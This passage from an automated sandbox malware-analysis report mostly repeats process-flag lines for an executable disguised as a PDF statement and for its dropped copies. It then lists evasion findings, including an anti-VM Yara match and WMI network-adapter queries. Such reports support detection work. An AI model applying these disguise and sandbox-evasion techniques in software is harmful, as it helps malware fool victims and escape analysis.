                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: SOA FOR APR 2024 PDF.exe PID: 1988, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: eeBIYZL.exe PID: 7512, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7928, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7240, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
